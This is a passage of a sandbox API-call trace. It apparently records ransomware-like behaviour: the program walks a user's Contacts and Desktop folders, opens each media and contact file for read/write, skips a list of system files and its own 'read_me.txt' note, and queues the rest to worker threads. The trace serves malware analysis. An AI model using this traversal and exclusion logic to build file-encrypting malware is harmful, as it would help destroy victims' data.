(lpFirst="lulcit amkdfe.contact", lpSrch="boot.ini") returned 0x0 [0075.971] StrStrW (lpFirst="lulcit amkdfe.contact", lpSrch="ntuser.dat.log") returned 0x0 [0075.971] StrStrW (lpFirst="lulcit amkdfe.contact", lpSrch="thumbs.db") returned 0x0 [0075.971] InterlockedExchangeAdd (in: Addend=0x40f064, Value=1 | out: Addend=0x40f064) returned 33 [0075.971] QueueUserWorkItem (Function=0x404e00, Context=0x7a4, Flags=0x0) returned 1 [0075.971] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x84afb60 | out: lpFindFileData=0x84afb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x245e6c80, ftCreationTime.dwHighDateTime=0x1d5a041, ftLastAccessTime.dwLowDateTime=0x245e6c80, ftLastAccessTime.dwHighDateTime=0x1d5a041, ftLastWriteTime.dwLowDateTime=0x245e6c80, ftLastWriteTime.dwHighDateTime=0x1d5a041, nFileSizeHigh=0x0, nFileSizeLow=0x6b3, dwReserved0=0x4f10000, dwReserved1=0x0, cFileName="read_me.txt", cAlternateFileName="")) returned 1 [0075.971] wnsprintfW (in: pszDest=0x8af0080, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\read_me.txt") returned 54 [0075.971] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\read_me.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\read_me.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x7fc [0075.971] StrStrW (lpFirst="read_me.txt", lpSrch="read_me.txt") returned="read_me.txt" [0075.971] CloseHandle (hObject=0x7fc) returned 1 [0075.971] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x84afb60 | out: lpFindFileData=0x84afb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2eaf1340, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x2eaf1340, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x2eaf1340, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x494, dwReserved0=0x4f10000, dwReserved1=0x0, cFileName="sikvnb huvuib.contact", cAlternateFileName="SIKVNB~1.CON")) returned 1 [0075.971] wnsprintfW (in: pszDest=0x8af0080, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\sikvnb huvuib.contact") returned 64 [0075.971] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\sikvnb huvuib.contact" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\sikvnb huvuib.contact"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x804 [0075.987] StrStrW (lpFirst="sikvnb huvuib.contact", lpSrch="read_me.txt") returned 0x0 [0075.987] StrStrW (lpFirst="sikvnb huvuib.contact", lpSrch="autoexec.bat") returned 0x0 [0075.987] StrStrW (lpFirst="sikvnb huvuib.contact", lpSrch="desktop.ini") returned 0x0 [0075.987] StrStrW (lpFirst="sikvnb huvuib.contact", lpSrch="autorun.inf") returned 0x0 [0075.987] StrStrW (lpFirst="sikvnb huvuib.contact", lpSrch="ntuser.dat") returned 0x0 [0075.987] StrStrW (lpFirst="sikvnb huvuib.contact", lpSrch="iconcache.db") returned 0x0 [0075.987] StrStrW (lpFirst="sikvnb huvuib.contact", lpSrch="bootsect.bak") returned 0x0 [0075.987] StrStrW (lpFirst="sikvnb huvuib.contact", lpSrch="boot.ini") returned 0x0 [0075.988] StrStrW (lpFirst="sikvnb huvuib.contact", lpSrch="ntuser.dat.log") returned 0x0 [0075.988] StrStrW (lpFirst="sikvnb huvuib.contact", lpSrch="thumbs.db") returned 0x0 [0075.988] InterlockedExchangeAdd (in: Addend=0x40f064, Value=1 | out: Addend=0x40f064) returned 36 [0075.988] QueueUserWorkItem (Function=0x404e00, Context=0x804, Flags=0x0) returned 1 [0075.988] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x84afb60 | out: lpFindFileData=0x84afb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2eaf1340, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x2eaf1340, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x2eaf1340, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x494, dwReserved0=0x4f10000, dwReserved1=0x0, cFileName="sikvnb huvuib.contact", cAlternateFileName="SIKVNB~1.CON")) returned 0 [0075.988] FindClose (in: hFindFile=0x7cfe968 | out: hFindFile=0x7cfe968) returned 1 [0075.988] wnsprintfW (in: pszDest=0x8af0080, cchDest=32767, pszFmt="%s\\read_me.txt" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\read_me.txt") returned 54 [0075.988] GetProcessHeap () returned 0x4f10000 [0075.988] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8af0080 | out: hHeap=0x4f10000) returned 1 [0075.988] InterlockedExchangeAdd (in: Addend=0x40f16c, Value=1 | out: Addend=0x40f16c) returned 40 [0075.988] GetProcessHeap () returned 0x4f10000 [0075.988] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8b00088 | out: hHeap=0x4f10000) returned 1 [0075.988] GetProcessHeap () returned 0x4f10000 [0075.988] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0xfffe) returned 0x8b400a8 [0075.988] wnsprintfW (in: pszDest=0x8b400a8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\4aQclz9QavwtjC5QkBV\\j9-MN6\\*") returned 70 [0075.988] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\4aQclz9QavwtjC5QkBV\\j9-MN6\\*", lpFindFileData=0x84afb60 | out: lpFindFileData=0x84afb60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3cf13e40, ftCreationTime.dwHighDateTime=0x1d4d093, ftLastAccessTime.dwLowDateTime=0x246a5360, ftLastAccessTime.dwHighDateTime=0x1d5a041, ftLastWriteTime.dwLowDateTime=0x246a5360, ftLastWriteTime.dwHighDateTime=0x1d5a041, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4f10000, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x7cfe968 [0075.988] wnsprintfW (in: pszDest=0x8b400a8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\4aQclz9QavwtjC5QkBV\\j9-MN6\\.") returned 70 [0075.988] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x84afb60 | out: lpFindFileData=0x84afb60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3cf13e40, ftCreationTime.dwHighDateTime=0x1d4d093, ftLastAccessTime.dwLowDateTime=0x246a5360, ftLastAccessTime.dwHighDateTime=0x1d5a041, ftLastWriteTime.dwLowDateTime=0x246a5360, ftLastWriteTime.dwHighDateTime=0x1d5a041, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4f10000, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0075.988] wnsprintfW (in: pszDest=0x8b400a8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\4aQclz9QavwtjC5QkBV\\j9-MN6\\..") returned 71 [0075.988] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x84afb60 | out: lpFindFileData=0x84afb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5feadc80, ftCreationTime.dwHighDateTime=0x1d4c79c, ftLastAccessTime.dwLowDateTime=0x82b86f30, ftLastAccessTime.dwHighDateTime=0x1d4c69c, ftLastWriteTime.dwLowDateTime=0x82b86f30, ftLastWriteTime.dwHighDateTime=0x1d4c69c, nFileSizeHigh=0x0, nFileSizeLow=0x4b90, dwReserved0=0x4f10000, dwReserved1=0x0, cFileName="amZv2Z0wxoZS.flv", cAlternateFileName="AMZV2Z~1.FLV")) returned 1 [0075.988] wnsprintfW (in: pszDest=0x8b400a8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\4aQclz9QavwtjC5QkBV\\j9-MN6\\amZv2Z0wxoZS.flv") returned 85 [0075.988] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\4aQclz9QavwtjC5QkBV\\j9-MN6\\amZv2Z0wxoZS.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\4aqclz9qavwtjc5qkbv\\j9-mn6\\amzv2z0wxozs.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x810 [0075.988] StrStrW (lpFirst="amzv2z0wxozs.flv", lpSrch="read_me.txt") returned 0x0 [0075.989] StrStrW (lpFirst="amzv2z0wxozs.flv", lpSrch="autoexec.bat") returned 0x0 [0075.989] StrStrW (lpFirst="amzv2z0wxozs.flv", lpSrch="desktop.ini") returned 0x0 [0075.989] StrStrW (lpFirst="amzv2z0wxozs.flv", lpSrch="autorun.inf") returned 0x0 [0075.989] StrStrW (lpFirst="amzv2z0wxozs.flv", lpSrch="ntuser.dat") returned 0x0 [0075.989] StrStrW (lpFirst="amzv2z0wxozs.flv", lpSrch="iconcache.db") returned 0x0 [0075.989] StrStrW (lpFirst="amzv2z0wxozs.flv", lpSrch="bootsect.bak") returned 0x0 [0075.989] StrStrW (lpFirst="amzv2z0wxozs.flv", lpSrch="boot.ini") returned 0x0 [0075.989] StrStrW (lpFirst="amzv2z0wxozs.flv", lpSrch="ntuser.dat.log") returned 0x0 [0075.989] StrStrW (lpFirst="amzv2z0wxozs.flv", lpSrch="thumbs.db") returned 0x0 [0075.989] InterlockedExchangeAdd (in: Addend=0x40f064, Value=1 | out: Addend=0x40f064) returned 37 [0075.989] QueueUserWorkItem (Function=0x404e00, Context=0x810, Flags=0x0) returned 1 [0075.989] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x84afb60 | out: lpFindFileData=0x84afb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f8f0e90, ftCreationTime.dwHighDateTime=0x1d4c865, ftLastAccessTime.dwLowDateTime=0x902beec0, ftLastAccessTime.dwHighDateTime=0x1d4c701, ftLastWriteTime.dwLowDateTime=0x902beec0, ftLastWriteTime.dwHighDateTime=0x1d4c701, nFileSizeHigh=0x0, nFileSizeLow=0x18992, dwReserved0=0x4f10000, dwReserved1=0x0, cFileName="d3xNIviLk0Lwv1A.mp3", cAlternateFileName="D3XNIV~1.MP3")) returned 1 [0075.989] wnsprintfW (in: pszDest=0x8b400a8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\4aQclz9QavwtjC5QkBV\\j9-MN6\\d3xNIviLk0Lwv1A.mp3") returned 88 [0075.989] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\4aQclz9QavwtjC5QkBV\\j9-MN6\\d3xNIviLk0Lwv1A.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\4aqclz9qavwtjc5qkbv\\j9-mn6\\d3xnivilk0lwv1a.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x814 [0075.989] StrStrW (lpFirst="d3xnivilk0lwv1a.mp3", lpSrch="read_me.txt") returned 0x0 [0075.989] StrStrW (lpFirst="d3xnivilk0lwv1a.mp3", lpSrch="autoexec.bat") returned 0x0 [0075.989] StrStrW (lpFirst="d3xnivilk0lwv1a.mp3", lpSrch="desktop.ini") returned 0x0 [0075.989] StrStrW (lpFirst="d3xnivilk0lwv1a.mp3", lpSrch="autorun.inf") returned 0x0 [0075.990] StrStrW (lpFirst="d3xnivilk0lwv1a.mp3", lpSrch="ntuser.dat") returned 0x0 [0075.990] StrStrW (lpFirst="d3xnivilk0lwv1a.mp3", lpSrch="iconcache.db") returned 0x0 [0075.990] StrStrW (lpFirst="d3xnivilk0lwv1a.mp3", lpSrch="bootsect.bak") returned 0x0 [0075.990] StrStrW (lpFirst="d3xnivilk0lwv1a.mp3", lpSrch="boot.ini") returned 0x0 [0075.990] StrStrW (lpFirst="d3xnivilk0lwv1a.mp3", lpSrch="ntuser.dat.log") returned 0x0 [0075.990] StrStrW (lpFirst="d3xnivilk0lwv1a.mp3", lpSrch="thumbs.db") returned 0x0 [0075.990] InterlockedExchangeAdd (in: Addend=0x40f064, Value=1 | out: Addend=0x40f064) returned 38 [0075.990] QueueUserWorkItem (Function=0x404e00, Context=0x814, Flags=0x0) returned 1 [0075.990] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x84afb60 | out: lpFindFileData=0x84afb60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1a309220, ftCreationTime.dwHighDateTime=0x1d4ca67, ftLastAccessTime.dwLowDateTime=0x246a5360, ftLastAccessTime.dwHighDateTime=0x1d5a041, ftLastWriteTime.dwLowDateTime=0x246a5360, ftLastWriteTime.dwHighDateTime=0x1d5a041, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4f10000, dwReserved1=0x0, cFileName="OFbSLjMg5F ypHpxq3Lw", cAlternateFileName="OFBSLJ~1")) returned 1 [0075.990] wnsprintfW (in: pszDest=0x8b400a8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\4aQclz9QavwtjC5QkBV\\j9-MN6\\OFbSLjMg5F ypHpxq3Lw") returned 89 [0075.990] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x84afb60 | out: lpFindFileData=0x84afb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x246a5360, ftCreationTime.dwHighDateTime=0x1d5a041, ftLastAccessTime.dwLowDateTime=0x246a5360, ftLastAccessTime.dwHighDateTime=0x1d5a041, ftLastWriteTime.dwLowDateTime=0x246a5360, ftLastWriteTime.dwHighDateTime=0x1d5a041, nFileSizeHigh=0x0, nFileSizeLow=0x6b3, dwReserved0=0x4f10000, dwReserved1=0x0, cFileName="read_me.txt", cAlternateFileName="")) returned 1 [0075.990] wnsprintfW (in: pszDest=0x8b400a8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\4aQclz9QavwtjC5QkBV\\j9-MN6\\read_me.txt") returned 80 [0075.990] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\4aQclz9QavwtjC5QkBV\\j9-MN6\\read_me.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\4aqclz9qavwtjc5qkbv\\j9-mn6\\read_me.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x818 [0075.990] StrStrW (lpFirst="read_me.txt", lpSrch="read_me.txt") returned="read_me.txt" [0075.990] CloseHandle (hObject=0x818) returned 1 [0075.990] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x84afb60 | out: lpFindFileData=0x84afb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x246a5360, ftCreationTime.dwHighDateTime=0x1d5a041, ftLastAccessTime.dwLowDateTime=0x246a5360, ftLastAccessTime.dwHighDateTime=0x1d5a041, ftLastWriteTime.dwLowDateTime=0x246a5360, ftLastWriteTime.dwHighDateTime=0x1d5a041, nFileSizeHigh=0x0, nFileSizeLow=0x6b3, dwReserved0=0x4f10000, dwReserved1=0x0, cFileName="read_me.txt", cAlternateFileName="")) returned 0 [0075.990] FindClose (in: hFindFile=0x7cfe968 | out: hFindFile=0x7cfe968) returned 1 [0075.990] wnsprintfW (in: pszDest=0x8b400a8, cchDest=32767, pszFmt="%s\\read_me.txt" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\4aQclz9QavwtjC5QkBV\\j9-MN6\\read_me.txt") returned 80 [0075.990] GetProcessHeap () returned 0x4f10000 [0075.991] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8b400a8 | out: hHeap=0x4f10000) returned 1 [0075.991] InterlockedExchangeAdd (in: Addend=0x40f16c, Value=1 | out: Addend=0x40f16c) returned 41 [0075.991] GetProcessHeap () returned 0x4f10000 [0075.991] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8b600b8 | out: hHeap=0x4f10000) returned 1 [0075.991] GetProcessHeap () returned 0x4f10000 [0075.991] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0xfffe) returned 0x8b600b8 [0075.991] wnsprintfW (in: pszDest=0x8b600b8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\4aQclz9QavwtjC5QkBV\\j9-MN6\\OFbSLjMg5F ypHpxq3Lw\\*") returned 91 [0075.991] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\4aQclz9QavwtjC5QkBV\\j9-MN6\\OFbSLjMg5F ypHpxq3Lw\\*", lpFindFileData=0x84afb60 | out: lpFindFileData=0x84afb60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1a309220, ftCreationTime.dwHighDateTime=0x1d4ca67, ftLastAccessTime.dwLowDateTime=0x246a5360, ftLastAccessTime.dwHighDateTime=0x1d5a041, ftLastWriteTime.dwLowDateTime=0x246a5360, ftLastWriteTime.dwHighDateTime=0x1d5a041, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4f10000, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x7cfe968 [0075.991] wnsprintfW (in: pszDest=0x8b600b8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\4aQclz9QavwtjC5QkBV\\j9-MN6\\OFbSLjMg5F ypHpxq3Lw\\.") returned 91 [0075.991] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x84afb60 | out: lpFindFileData=0x84afb60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1a309220, ftCreationTime.dwHighDateTime=0x1d4ca67, ftLastAccessTime.dwLowDateTime=0x246a5360, ftLastAccessTime.dwHighDateTime=0x1d5a041, ftLastWriteTime.dwLowDateTime=0x246a5360, ftLastWriteTime.dwHighDateTime=0x1d5a041, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4f10000, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0075.991] wnsprintfW (in: pszDest=0x8b600b8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\4aQclz9QavwtjC5QkBV\\j9-MN6\\OFbSLjMg5F ypHpxq3Lw\\..") returned 92 [0075.991] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x84afb60 | out: lpFindFileData=0x84afb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x70b61770, ftCreationTime.dwHighDateTime=0x1d4d0a5, ftLastAccessTime.dwLowDateTime=0x43392fa0, ftLastAccessTime.dwHighDateTime=0x1d4ca2c, ftLastWriteTime.dwLowDateTime=0x43392fa0, ftLastWriteTime.dwHighDateTime=0x1d4ca2c, nFileSizeHigh=0x0, nFileSizeLow=0x77ba, dwReserved0=0x4f10000, dwReserved1=0x0, cFileName="-sIkef49wnJO.bmp", cAlternateFileName="-SIKEF~1.BMP")) returned 1 [0075.991] wnsprintfW (in: pszDest=0x8b600b8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\4aQclz9QavwtjC5QkBV\\j9-MN6\\OFbSLjMg5F ypHpxq3Lw\\-sIkef49wnJO.bmp") returned 106 [0075.991] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\4aQclz9QavwtjC5QkBV\\j9-MN6\\OFbSLjMg5F ypHpxq3Lw\\-sIkef49wnJO.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\4aqclz9qavwtjc5qkbv\\j9-mn6\\ofbsljmg5f yphpxq3lw\\-sikef49wnjo.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x818 [0075.991] StrStrW (lpFirst="-sikef49wnjo.bmp", lpSrch="read_me.txt") returned 0x0 [0075.991] StrStrW (lpFirst="-sikef49wnjo.bmp", lpSrch="autoexec.bat") returned 0x0 [0075.991] StrStrW (lpFirst="-sikef49wnjo.bmp", lpSrch="desktop.ini") returned 0x0 [0075.991] StrStrW (lpFirst="-sikef49wnjo.bmp", lpSrch="autorun.inf") returned 0x0 [0075.991] StrStrW (lpFirst="-sikef49wnjo.bmp", lpSrch="ntuser.dat") returned 0x0 [0075.991] StrStrW (lpFirst="-sikef49wnjo.bmp", lpSrch="iconcache.db") returned 0x0 [0075.992] StrStrW (lpFirst="-sikef49wnjo.bmp", lpSrch="bootsect.bak") returned 0x0 [0075.992] StrStrW (lpFirst="-sikef49wnjo.bmp", lpSrch="boot.ini") returned 0x0 [0075.992] StrStrW (lpFirst="-sikef49wnjo.bmp", lpSrch="ntuser.dat.log") returned 0x0 [0075.992] StrStrW (lpFirst="-sikef49wnjo.bmp", lpSrch="thumbs.db") returned 0x0 [0075.992] InterlockedExchangeAdd (in: Addend=0x40f064, Value=1 | out: Addend=0x40f064) returned 39 [0075.992] QueueUserWorkItem (Function=0x404e00, Context=0x818, Flags=0x0) returned 1 [0075.992] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x84afb60 | out: lpFindFileData=0x84afb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbc84580, ftCreationTime.dwHighDateTime=0x1d4cf98, ftLastAccessTime.dwLowDateTime=0xd493cc90, ftLastAccessTime.dwHighDateTime=0x1d4c828, ftLastWriteTime.dwLowDateTime=0xd493cc90, ftLastWriteTime.dwHighDateTime=0x1d4c828, nFileSizeHigh=0x0, nFileSizeLow=0xaf65, dwReserved0=0x4f10000, dwReserved1=0x0, cFileName="eW2I.m4a", cAlternateFileName="")) returned 1 [0075.992] wnsprintfW (in: pszDest=0x8b600b8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\4aQclz9QavwtjC5QkBV\\j9-MN6\\OFbSLjMg5F ypHpxq3Lw\\eW2I.m4a") returned 98 [0075.992] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\4aQclz9QavwtjC5QkBV\\j9-MN6\\OFbSLjMg5F ypHpxq3Lw\\eW2I.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\4aqclz9qavwtjc5qkbv\\j9-mn6\\ofbsljmg5f yphpxq3lw\\ew2i.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x81c [0075.992] StrStrW (lpFirst="ew2i.m4a", lpSrch="read_me.txt") returned 0x0 [0075.992] StrStrW (lpFirst="ew2i.m4a", lpSrch="autoexec.bat") returned 0x0 [0075.992] StrStrW (lpFirst="ew2i.m4a", lpSrch="desktop.ini") returned 0x0 [0075.992] StrStrW (lpFirst="ew2i.m4a", lpSrch="autorun.inf") returned 0x0 [0075.992] StrStrW (lpFirst="ew2i.m4a", lpSrch="ntuser.dat") returned 0x0 [0075.992] StrStrW (lpFirst="ew2i.m4a", lpSrch="iconcache.db") returned 0x0 [0075.992] StrStrW (lpFirst="ew2i.m4a", lpSrch="bootsect.bak") returned 0x0 [0075.993] StrStrW (lpFirst="ew2i.m4a", lpSrch="boot.ini") returned 0x0 [0075.993] StrStrW (lpFirst="ew2i.m4a", lpSrch="ntuser.dat.log") returned 0x0 [0075.993] StrStrW (lpFirst="ew2i.m4a", lpSrch="thumbs.db") returned 0x0 [0075.993] InterlockedExchangeAdd (in: Addend=0x40f064, Value=1 | out: Addend=0x40f064) returned 40 [0075.993] QueueUserWorkItem (Function=0x404e00, Context=0x81c, Flags=0x0) returned 1 [0075.993] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x84afb60 | out: lpFindFileData=0x84afb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x817aeab0, ftCreationTime.dwHighDateTime=0x1d4d314, ftLastAccessTime.dwLowDateTime=0xb8f0b330, ftLastAccessTime.dwHighDateTime=0x1d4ce1e, ftLastWriteTime.dwLowDateTime=0xb8f0b330, ftLastWriteTime.dwHighDateTime=0x1d4ce1e, nFileSizeHigh=0x0, nFileSizeLow=0x4f77, dwReserved0=0x4f10000, dwReserved1=0x0, cFileName="fX4UaGBV46vnDsIHXb.gif", cAlternateFileName="FX4UAG~1.GIF")) returned 1 [0075.993] wnsprintfW (in: pszDest=0x8b600b8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\4aQclz9QavwtjC5QkBV\\j9-MN6\\OFbSLjMg5F ypHpxq3Lw\\fX4UaGBV46vnDsIHXb.gif") returned 112 [0075.993] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\4aQclz9QavwtjC5QkBV\\j9-MN6\\OFbSLjMg5F ypHpxq3Lw\\fX4UaGBV46vnDsIHXb.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\4aqclz9qavwtjc5qkbv\\j9-mn6\\ofbsljmg5f yphpxq3lw\\fx4uagbv46vndsihxb.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x820 [0075.993] StrStrW (lpFirst="fx4uagbv46vndsihxb.gif", lpSrch="read_me.txt") returned 0x0 [0075.993] StrStrW (lpFirst="fx4uagbv46vndsihxb.gif", lpSrch="autoexec.bat") returned 0x0 [0075.993] StrStrW (lpFirst="fx4uagbv46vndsihxb.gif", lpSrch="desktop.ini") returned 0x0 [0075.993] StrStrW (lpFirst="fx4uagbv46vndsihxb.gif", lpSrch="autorun.inf") returned 0x0 [0075.993] StrStrW (lpFirst="fx4uagbv46vndsihxb.gif", lpSrch="ntuser.dat") returned 0x0 [0075.993] StrStrW (lpFirst="fx4uagbv46vndsihxb.gif", lpSrch="iconcache.db") returned 0x0 [0075.993] StrStrW (lpFirst="fx4uagbv46vndsihxb.gif", lpSrch="bootsect.bak") returned 0x0 [0075.993] StrStrW (lpFirst="fx4uagbv46vndsihxb.gif", lpSrch="boot.ini") returned 0x0 [0075.993] StrStrW (lpFirst="fx4uagbv46vndsihxb.gif", lpSrch="ntuser.dat.log") returned 0x0 [0075.993] StrStrW (lpFirst="fx4uagbv46vndsihxb.gif", lpSrch="thumbs.db") returned 0x0 [0075.993] InterlockedExchangeAdd (in: Addend=0x40f064, Value=1 | out: Addend=0x40f064) returned 41 [0075.994] QueueUserWorkItem (Function=0x404e00, Context=0x820, Flags=0x0) returned 1 [0075.994] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x84afb60 | out: lpFindFileData=0x84afb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3edca970, ftCreationTime.dwHighDateTime=0x1d4d2d6, ftLastAccessTime.dwLowDateTime=0x58e6eb80, ftLastAccessTime.dwHighDateTime=0x1d4ce6e, ftLastWriteTime.dwLowDateTime=0x58e6eb80, ftLastWriteTime.dwHighDateTime=0x1d4ce6e, nFileSizeHigh=0x0, nFileSizeLow=0x6cb5, dwReserved0=0x4f10000, dwReserved1=0x0, cFileName="R-vKwcM20r5mYO.flv", cAlternateFileName="R-VKWC~1.FLV")) returned 1 [0075.994] wnsprintfW (in: pszDest=0x8b600b8, cchDest=32767, pszFmt="%s\\%s" | out: 